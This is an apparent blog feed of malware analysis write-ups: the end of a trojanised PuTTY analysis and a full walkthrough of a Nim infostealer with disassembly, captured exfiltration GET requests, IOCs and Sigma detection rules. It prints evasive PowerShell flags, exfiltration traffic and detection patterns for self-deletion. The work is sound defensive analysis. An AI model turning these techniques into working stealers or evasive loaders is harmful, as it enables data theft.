&lt;td&gt;&lt;code&gt;bonus2.corporatebonusapplication.local&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Port&lt;/td&gt;
&lt;td&gt;TCP 8443, TLS with certificate validation disabled&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Process ancestry&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;putty.exe&lt;/code&gt; spawning &lt;code&gt;powershell.exe&lt;/code&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Command line&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;-nop -w hidden -noni -ep bypass&lt;/code&gt; with &lt;code&gt;FromBase64String&lt;/code&gt; and &lt;code&gt;GzipStream&lt;/code&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;PE anomaly&lt;/td&gt;
&lt;td&gt;Invalid checksum on a file identifying itself as PuTTY&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;




&lt;h2&gt;
  
  
  MITRE ATT&amp;amp;CK mapping
&lt;/h2&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Tactic&lt;/th&gt;
&lt;th&gt;Technique&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Initial Access&lt;/td&gt;
&lt;td&gt;T1195.002, Supply Chain Compromise: Compromise Software Supply Chain&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Execution&lt;/td&gt;
&lt;td&gt;T1204.002, User Execution: Malicious File&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Execution&lt;/td&gt;
&lt;td&gt;T1059.001, Command and Scripting Interpreter: PowerShell&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Defense Evasion&lt;/td&gt;
&lt;td&gt;T1036.005, Masquerading: Match Legitimate Name or Location&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Defense Evasion&lt;/td&gt;
&lt;td&gt;T1027, Obfuscated Files or Information&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Defense Evasion&lt;/td&gt;
&lt;td&gt;T1140, Deobfuscate or Decode Files or Information&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Command and Control&lt;/td&gt;
&lt;td&gt;T1573.002, Encrypted Channel: Asymmetric Cryptography&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Command and Control&lt;/td&gt;
&lt;td&gt;T1571, Non-Standard Port&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;




&lt;h2&gt;
  
  
  Detection guidance
&lt;/h2&gt;

&lt;p&gt;The hash is worthless the moment someone recompiles. The domain is worthless the moment it is published. Here is what survives.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Process ancestry is the strongest signal by a wide margin.&lt;/strong&gt; A GUI application spawning a command interpreter is anomalous in almost every case. PuTTY specifically has no legitimate reason to do it. You do not need to understand anything about the payload to catch this.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="na"&gt;title&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;SSH or Remote Access Client Spawning PowerShell&lt;/span&gt;
&lt;span class="na"&gt;status&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;experimental&lt;/span&gt;
&lt;span class="na"&gt;logsource&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;category&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;process_creation&lt;/span&gt;
  &lt;span class="na"&gt;product&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;windows&lt;/span&gt;
&lt;span class="na"&gt;detection&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;parent&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;ParentImage|endswith&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s1"&gt;'&lt;/span&gt;&lt;span class="s"&gt;\putty.exe'&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s1"&gt;'&lt;/span&gt;&lt;span class="s"&gt;\kitty.exe'&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s1"&gt;'&lt;/span&gt;&lt;span class="s"&gt;\winscp.exe'&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s1"&gt;'&lt;/span&gt;&lt;span class="s"&gt;\mobaxterm.exe'&lt;/span&gt;
  &lt;span class="na"&gt;child&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;Image|endswith&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s1"&gt;'&lt;/span&gt;&lt;span class="s"&gt;\powershell.exe'&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s1"&gt;'&lt;/span&gt;&lt;span class="s"&gt;\pwsh.exe'&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s1"&gt;'&lt;/span&gt;&lt;span class="s"&gt;\cmd.exe'&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s1"&gt;'&lt;/span&gt;&lt;span class="s"&gt;\wscript.exe'&lt;/span&gt;
  &lt;span class="na"&gt;condition&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;parent and child&lt;/span&gt;
&lt;span class="na"&gt;falsepositives&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s"&gt;Rare. Investigate every hit.&lt;/span&gt;
&lt;span class="na"&gt;level&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;high&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Keep the parent list short and specific. The temptation is to expand it to every application on the estate, at which point the rule becomes a general anomaly detector and starts producing noise you will eventually mute.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Encoded PowerShell in a command line.&lt;/strong&gt; The combination of &lt;code&gt;FromBase64String&lt;/code&gt; with &lt;code&gt;GzipStream&lt;/code&gt; or &lt;code&gt;DeflateStream&lt;/code&gt; is a strong pattern. Legitimate administrative scripting does occasionally base64 encode arguments, but it rarely also compresses them. Requiring both cuts the false positive rate substantially.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Suppressed PowerShell execution flags.&lt;/strong&gt; Alert on &lt;code&gt;-nop&lt;/code&gt; together with &lt;code&gt;-w hidden&lt;/code&gt; and &lt;code&gt;-ep bypass&lt;/code&gt; appearing in one command line. Any one alone is common. All three together is close to diagnostic, though some legitimate deployment tooling does use them, so check your own estate before enabling this in production.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Outbound TLS to 8443 from an unexpected process.&lt;/strong&gt; Port 8443 has legitimate uses, so do not alert on the port alone. Alert when the initiating process is a scripting host rather than a browser or a known application.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;PE checksum validation on portable utilities.&lt;/strong&gt; This one is less common but worth considering if you have the telemetry. Administrators download standalone tools constantly, and a mismatch between a file's declared identity and its structural integrity is a cheap thing to check.&lt;/p&gt;

&lt;p&gt;All of the above needs testing against your own data before it goes anywhere near production. My false positive assumptions come from the environments I have worked in, not yours.&lt;/p&gt;




&lt;h2&gt;
  
  
  What I would take from this one
&lt;/h2&gt;

&lt;p&gt;The delivery mechanism was more interesting than the payload, and I think that is generally true of trojanised utilities. Anyone can find a PowerShell reverse shell. Getting an administrator to run it voluntarily, repeatedly, with a working SSH client as cover, is the harder problem, and this sample solves it neatly.&lt;/p&gt;

&lt;p&gt;Repeated detonation caught what a single run missed. The PowerShell window was visible for well under a second. That is a genuine argument for detonating several times and watching, rather than executing once and going straight to the logs.&lt;/p&gt;

&lt;p&gt;The strings told me almost nothing, and that was itself informative. Over 41,000 strings and no payload visible in any of them meant the malicious component had to be encoded or compressed somewhere. The absence pointed at the answer, just not quickly.&lt;/p&gt;

&lt;p&gt;Finally, the sample identified itself as PuTTY in every field an analyst would normally check, and it was telling the truth about most of them. Provenance checks that rely on metadata are weak against this. The checksum and the process behaviour are what actually gave it away.&lt;/p&gt;




&lt;p&gt;&lt;em&gt;Written by Vasilis Mantas, Senior Threat Detection Engineer. Analysis performed in an isolated lab using FlareVM, REMnux, FLOSS, PEStudio, Procmon, Wireshark and ncat.&lt;/em&gt;&lt;/p&gt;

</description>
      <category>malware</category>
      <category>analysis</category>
      <category>cybersecurity</category>
      <category>reversing</category>
    </item>
    <item>
      <title>Anatomy of a Nim Infostealer</title>
      <dc:creator>Vasilis Mantas</dc:creator>
      <pubDate>Mon, 31 Aug 2026 13:12:04 +0000</pubDate>
      <link>https://dev.to/vasilis_mantas/anatomy-of-a-nim-infostealer-4p99</link>
      <guid>https://dev.to/vasilis_mantas/anatomy-of-a-nim-infostealer-4p99</guid>
      <description>&lt;h2&gt;
  
  
  Tracing exfiltration and self-deletion through static, dynamic and advanced static analysis
&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;Vasilis Mantas&lt;/strong&gt; — Threat Detection Engineer&lt;/p&gt;




&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Verdict:&lt;/strong&gt; A 64-bit Windows infostealer written in Nim. It reads a target file from disk, encrypts the contents with RC4 using a key it collects at runtime, and exfiltrates the ciphertext in chunks over plain HTTP GET requests to a hardcoded C2 domain. It establishes no persistence. Instead it does the opposite, it deletes itself from disk on every exit path, whether it succeeds, fails, or is interrupted.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;This walkthrough covers the full triage chain on a single sample: basic static, basic dynamic, and advanced static analysis. The interesting part is not that the binary steals data. It is &lt;em&gt;how thoroughly it removes itself afterwards&lt;/em&gt;, and what that leaves behind for a defender to detect.&lt;/p&gt;

&lt;p&gt;A note on provenance: this sample comes from a training set, not from a live incident. The methodology and the detection logic are the point, not attribution.&lt;/p&gt;




&lt;h2&gt;
  
  
  Sample details
&lt;/h2&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Property&lt;/th&gt;
&lt;th&gt;Value&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;MD5&lt;/td&gt;
&lt;td&gt;&lt;code&gt;b9497ffb7e9c6f49823b95851ec874e3&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;SHA-256&lt;/td&gt;
&lt;td&gt;&lt;code&gt;3aca2a08cf296f1845d6171958ef0ffd1c8bdfc3e48bdd34a605cb1f7468213e&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;File size&lt;/td&gt;
&lt;td&gt;546.39 KB&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Architecture&lt;/td&gt;
&lt;td&gt;x64, EXE&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;VirusTotal&lt;/td&gt;
&lt;td&gt;37 / 69 vendors flagged at time of analysis&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Lab&lt;/td&gt;
&lt;td&gt;FlareVM (detonation), REMnux (network simulation)&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;Vendor labels clustered around backdoor and Meterpreter-style naming, which suggested remote access or reverse shell capability. That turned out to be wrong, and it is worth saying so plainly: vendor labels are a starting hypothesis, not a finding. The sample is a stealer, not a backdoor.&lt;/p&gt;




&lt;h2&gt;
  
  
  Basic static analysis
&lt;/h2&gt;

&lt;p&gt;Running FLOSS against the binary rather than plain &lt;code&gt;strings&lt;/code&gt; surfaces stack and obfuscated strings that a naive extraction misses:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight batchfile"&gt;&lt;code&gt;&lt;span class="kd"&gt;FLOSS&lt;/span&gt;&lt;span class="err"&gt;.exe&lt;/span&gt; &lt;span class="kd"&gt;unknown&lt;/span&gt;&lt;span class="err"&gt;.exe&lt;/span&gt;.malz &lt;span class="o"&gt;&amp;gt;&lt;/span&gt; &lt;span class="kd"&gt;output&lt;/span&gt;.txt
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The output is dominated by &lt;code&gt;nim&lt;/code&gt; imports, which is a strong indication the binary was compiled from Nim. That matters practically: Nim binaries carry a large runtime, produce unfamiliar symbol names, and are handled poorly by some decompilers. Knowing the source language early saves an hour of confusion later. The alternative — that an author deliberately salted the strings to &lt;em&gt;look&lt;/em&gt; like Nim, is possible but expensive, and nothing later in the analysis supported it.&lt;/p&gt;

&lt;p&gt;PEStudio gave the structural picture:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Indicator&lt;/th&gt;
&lt;th&gt;Detail&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Embedded file&lt;/td&gt;
&lt;td&gt;Overlay at offset &lt;code&gt;0x0006EA00&lt;/code&gt;, size 106,379 bytes&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;TLS callbacks&lt;/td&gt;
&lt;td&gt;2&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Section ratio&lt;/td&gt;
&lt;td&gt;80.71%&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Virtualized section&lt;/td&gt;
&lt;td&gt;&lt;code&gt;.bss&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Manifest identity&lt;/td&gt;
&lt;td&gt;&lt;code&gt;winim&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Suspicious API groups&lt;/td&gt;
&lt;td&gt;network (16), execution (20), file (20), memory (20)&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;The &lt;code&gt;winim&lt;/code&gt; manifest identity is the Nim library that wraps the Windows API, consistent with the string evidence. The network and file API clusters are the first hint at the sample's actual function: it touches files and it talks over the network.&lt;/p&gt;




&lt;h2&gt;
  
  
  Basic dynamic analysis
&lt;/h2&gt;

&lt;p&gt;The first detonation, with no network simulation running, produced an unhelpful result, the binary deleted itself a few seconds after execution.&lt;/p&gt;

&lt;p&gt;That behaviour is itself a finding. A sample that removes itself when it cannot reach the network is checking for connectivity and bailing out. It also means every subsequent detonation needs REMnux running inetsim first, or there is nothing to observe.&lt;/p&gt;

&lt;p&gt;With inetsim providing fake DNS and HTTP, and Wireshark capturing, the picture filled in. The sample completes a TCP three-way handshake and issues an initial callback:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight http"&gt;&lt;code&gt;&lt;span class="nf"&gt;GET&lt;/span&gt; &lt;span class="nn"&gt;/&lt;/span&gt; &lt;span class="k"&gt;HTTP&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="m"&gt;1.1&lt;/span&gt;
&lt;span class="na"&gt;Host&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s"&gt;update.ec12-4-109-278-3-ubuntu20-04.local&lt;/span&gt;
&lt;span class="na"&gt;User-Agent&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Mozilla/5.0&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;It then begins feeding data to a second URI:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight http"&gt;&lt;code&gt;&lt;span class="err"&gt;GET /feed?post=A8E437E8F0367592569A2870BBDD382A1DFBB01A15FC23999D7788C33502A...
Host: cdn.altimiter.local
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Two details are worth pulling out.&lt;/p&gt;

&lt;p&gt;First, the long hexadecimal blob in the query string is the exfiltration channel. Data is not POSTed; it is encoded into a GET parameter and sent in pieces. This is deliberately unremarkable traffic, outbound HTTP GETs to a CDN-looking hostname are exactly what a proxy log is full of.&lt;/p&gt;

&lt;p&gt;Second, the initial callback URI does not appear anywhere in the strings output. It is concatenated at runtime. Any detection or hunting approach that relies on matching static strings against known-bad domains would have missed this one entirely.&lt;/p&gt;

&lt;p&gt;Procmon then confirmed the file interaction:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Operation is CreateFile, Process Name is unknown.exe
→ C:\Users\Public\passwrd.txt   SUCCESS
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Notably absent: no startup folder writes, no &lt;code&gt;Run&lt;/code&gt; key modification, no scheduled task, no service creation. The binary establishes &lt;strong&gt;no persistence mechanism at all&lt;/strong&gt;.&lt;/p&gt;




&lt;h2&gt;
  
  
  Advanced static analysis
&lt;/h2&gt;

&lt;p&gt;Loading the binary into Cutter and searching the symbol table for the &lt;code&gt;toRC4&lt;/code&gt; method seen in the strings output gave the pivot point:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;[0x00409ab2]
toRC4__OOZOOZOOZOOZOOZOOnimbleZpkgsZ82675245480490482826752_51 (int64_t arg1, int64_t arg2)
    ...
    call  genKeystream__OOZOOZOOZOOZOOZOOnimbleZpkgs...
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;RC4 is a stream cipher, so its presence tells us the exfiltrated data is encrypted rather than sent in the clear. That explains the hex blob in the GET parameter.&lt;/p&gt;

&lt;p&gt;Following the cross-references, &lt;code&gt;toRC4&lt;/code&gt; is called from a method named &lt;code&gt;StealStuff&lt;/code&gt;, and the call sits inside a loop. That single structural observation explains the traffic pattern: the sample reads its target, encrypts it in chunks, and sends each chunk as a separate request. The loop in the disassembly and the repeated GETs in the packet capture are the same behaviour viewed from two angles.&lt;/p&gt;

&lt;p&gt;The key comes from &lt;code&gt;C:\Users\Public\passwrd.txt&lt;/code&gt;, which contains the single string &lt;code&gt;SikoMode&lt;/code&gt;, the RC4 passphrase, read from disk at runtime rather than embedded in the binary.&lt;/p&gt;

&lt;h3&gt;
  
  
  The killswitch and the self-delete
&lt;/h3&gt;

&lt;p&gt;Nim binaries expose three entry-adjacent methods: &lt;code&gt;NimMain&lt;/code&gt;, &lt;code&gt;NimMainInner&lt;/code&gt; and &lt;code&gt;NimMainModule&lt;/code&gt;. The interesting logic lives in &lt;code&gt;NimMainModule&lt;/code&gt;:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;[0x00417913]
call  nosgetCurrentDir
lea   rcx, [0x00439c58]
call  asgnRef
call  checkKillSwitchURL__sikomode_25
mov   byte [0x00439be4], al
test  al, al
jne   0x417940
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;code&gt;checkKillSwitchURL&lt;/code&gt; returns a boolean. If the URL is unreachable, execution branches to a method named &lt;code&gt;houdini&lt;/code&gt;, appropriately, since it makes the binary disappear.&lt;/p&gt;

&lt;p&gt;Tracing the graph further shows &lt;code&gt;houdini&lt;/code&gt; is not only reached on failure. It is called when the DNS request fails on execution, when execution is interrupted at any point, &lt;strong&gt;and&lt;/strong&gt; when the sample finishes exfiltrating everything it was written to collect. Every path terminates in self-deletion.&lt;/p&gt;

&lt;p&gt;This is a deliberate anti-forensic design. The operator accepts losing reinfection capability in exchange for leaving no binary on disk for a responder to find. It reframes what detection has to look for.&lt;/p&gt;




&lt;h2&gt;
  
  
  Indicators of compromise
&lt;/h2&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Type&lt;/th&gt;
&lt;th&gt;Indicator&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;SHA-256&lt;/td&gt;
&lt;td&gt;&lt;code&gt;3aca2a08cf296f1845d6171958ef0ffd1c8bdfc3e48bdd34a605cb1f7468213e&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;MD5&lt;/td&gt;
&lt;td&gt;&lt;code&gt;b9497ffb7e9c6f49823b95851ec874e3&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Domain&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;update.ec12-4-109-278-3-ubuntu20-04.local&lt;/code&gt; (runtime-concatenated)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Domain&lt;/td&gt;
&lt;td&gt;&lt;code&gt;cdn.altimiter.local&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;URI pattern&lt;/td&gt;
&lt;td&gt;&lt;code&gt;/feed?post=&amp;lt;hex&amp;gt;&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;File&lt;/td&gt;
&lt;td&gt;&lt;code&gt;C:\Users\Public\passwrd.txt&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Behaviour&lt;/td&gt;
&lt;td&gt;Self-deletion of the executing binary on all exit paths&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;




&lt;h2&gt;
  
  
  MITRE ATT&amp;amp;CK mapping
&lt;/h2&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Tactic&lt;/th&gt;
&lt;th&gt;Technique&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Discovery&lt;/td&gt;
&lt;td&gt;T1083 — File and Directory Discovery&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Collection&lt;/td&gt;
&lt;td&gt;T1005 — Data from Local System&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Command and Control&lt;/td&gt;
&lt;td&gt;T1071.001 — Application Layer Protocol: Web Protocols&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Command and Control&lt;/td&gt;
&lt;td&gt;T1132.001 — Data Encoding: Standard Encoding&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Exfiltration&lt;/td&gt;
&lt;td&gt;T1041 — Exfiltration Over C2 Channel&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Defense Evasion&lt;/td&gt;
&lt;td&gt;T1070.004 — Indicator Removal: File Deletion&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Defense Evasion&lt;/td&gt;
&lt;td&gt;T1027 — Obfuscated Files or Information&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;




&lt;h2&gt;
  
  
  Detection guidance
&lt;/h2&gt;

&lt;p&gt;Most write-ups stop at the IOC table. IOCs age badly — the hash changes on recompile and the domains are burned the moment they are published. The behaviour is what persists, so here is what to actually detect.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;1. Self-deletion of a running executable.&lt;/strong&gt; The strongest signal, because it is unusual for benign software and this sample does it unconditionally. The canonical implementation is a process spawning a command interpreter that deletes the parent's own image path.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="na"&gt;title&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Executable Deletes Itself After Execution&lt;/span&gt;
&lt;span class="na"&gt;status&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;experimental&lt;/span&gt;
&lt;span class="na"&gt;logsource&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;category&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;process_creation&lt;/span&gt;
  &lt;span class="na"&gt;product&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;windows&lt;/span&gt;
&lt;span class="na"&gt;detection&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;selection&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;Image|endswith&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s1"&gt;'&lt;/span&gt;&lt;span class="s"&gt;\cmd.exe'&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s1"&gt;'&lt;/span&gt;&lt;span class="s"&gt;\powershell.exe'&lt;/span&gt;
    &lt;span class="na"&gt;CommandLine|contains&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s1"&gt;'&lt;/span&gt;&lt;span class="s"&gt;del&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;'&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s1"&gt;'&lt;/span&gt;&lt;span class="s"&gt;Remove-Item'&lt;/span&gt;
  &lt;span class="na"&gt;parent_in_temp&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;ParentImage|contains&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s1"&gt;'&lt;/span&gt;&lt;span class="s"&gt;\Users\'&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s1"&gt;'&lt;/span&gt;&lt;span class="s"&gt;\Temp\'&lt;/span&gt;
  &lt;span class="na"&gt;condition&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;selection and parent_in_temp&lt;/span&gt;
&lt;span class="na"&gt;falsepositives&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s"&gt;Installers and self-extracting archives cleaning up&lt;/span&gt;
&lt;span class="na"&gt;level&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;medium&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;2. High-entropy data in outbound HTTP GET query parameters.&lt;/strong&gt; The exfiltration channel is a long hex string in a URI. Proxy or firewall logs will show it. Threshold on query-string length and character-class distribution rather than on the domain, since the domain is disposable.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;3. Unexpected reads of files in &lt;code&gt;C:\Users\Public&lt;/code&gt;.&lt;/strong&gt; The sample sourced its encryption key from a world-readable location. That directory is rarely touched by legitimate user processes and makes a low-noise hunting ground.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;4. Beacon-shaped repetition.&lt;/strong&gt; The chunked exfiltration produces many similar-length requests to one host in a short window. Summarising outbound requests by destination and counting near-identical URI structures surfaces this regardless of what the domain is called.&lt;/p&gt;

&lt;p&gt;Detection hypotheses need validating against your own telemetry before they go into production. Treat the rule above as a starting point and tune the parent-process conditions to your environment.&lt;/p&gt;




&lt;h2&gt;
  
  
  Analyst takeaways
&lt;/h2&gt;

&lt;p&gt;Three things from this sample are worth carrying forward.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Vendor labels are a hypothesis.&lt;/strong&gt; Thirty-seven engines suggested backdoor. The sample is a stealer with no remote access capability whatsoever. Reading the labels as a conclusion would have sent the entire analysis in the wrong direction.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Absence of persistence is a finding, not a dead end.&lt;/strong&gt; When a sample deliberately leaves nothing behind, detection has to move up the stack, to network behaviour and to the act of removal itself.&lt;/p&gt;

